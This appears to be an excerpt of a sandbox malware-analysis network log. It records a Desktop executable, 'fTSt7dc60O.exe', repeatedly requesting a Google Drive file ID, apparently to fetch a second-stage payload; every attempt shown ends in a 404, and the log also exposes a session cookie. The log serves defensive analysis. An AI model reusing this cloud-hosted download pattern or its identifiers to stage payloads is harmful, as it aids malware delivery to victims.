                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:34 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:33 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-2gk-K7YLXLtQtuGqE2y8qg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    27192.168.2.752209142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:34 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:35 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgQkmAeXebdqmTqi1yeU223BM4MhkOaYxpsVASarLDNC5tgdIZ_60Kp25UC08eSzoWHb
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:34 GMT
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: script-src 'nonce-M4JJoc1_47xTWYvAu-RR0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:35 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 79 64 2d 49 43 61 45 6f 6a 65 58 57 46 4d 67 38 4d 43 7a 48 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ryd-ICaEojeXWFMg8MCzHA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    28192.168.2.752212172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:35 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:36 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:36 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-jh9AcGyeAQQWRmT9vYc0Hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    29192.168.2.752213142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:36 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:37 UTC1851INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC6ESL8IBcz6NFrGm2s2pPvteangT7aX8Xgg8YnHLKm3TYyFaCcA00icFnlS0dErSQsauGXYbJo
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:37 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-Bg-1oG4AlEhkaFS1cJdBFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:37 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 57 4c 4f 6c 44 6e 32 58 4c 71 4b 39 53 59 70 46 48 4f 73 41 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qWLOlDn2XLqK9SYpFHOsAg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    30192.168.2.752214172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:38 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:38 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:38 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-DAA9hbvoYYVYzxLwq_k-HA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    31192.168.2.752215142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:39 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:39 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC6PgHZhhCKPNxdk4ClD9AhID3JFGwhxeUAxtV7mFi5rjTzbIAkuvZDjbUqNwFm3ca1Z
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:39 GMT
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-gHANx6DOk3FawaEJdlU1wg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:39 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 4b 6b 72 37 44 34 54 59 55 70 4a 35 66 59 70 6c 41 44 66 36 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lKkr7D4TYUpJ5fYplADf6Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    32192.168.2.752217172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:40 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:40 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:40 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: script-src 'nonce-uamMN-N2WmfIiS7w5YTQ7w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    33192.168.2.752218142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:41 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:42 UTC1851INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgT1onx0nu54vQZxvHlZa-c5JGJbZmkyIJ7uSX93FbYGUarmBgRJeXKLbIVZ6PIexQqMMJIjtow
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:41 GMT
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: script-src 'nonce-t2NhpWlHafpLxdxe91oQwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
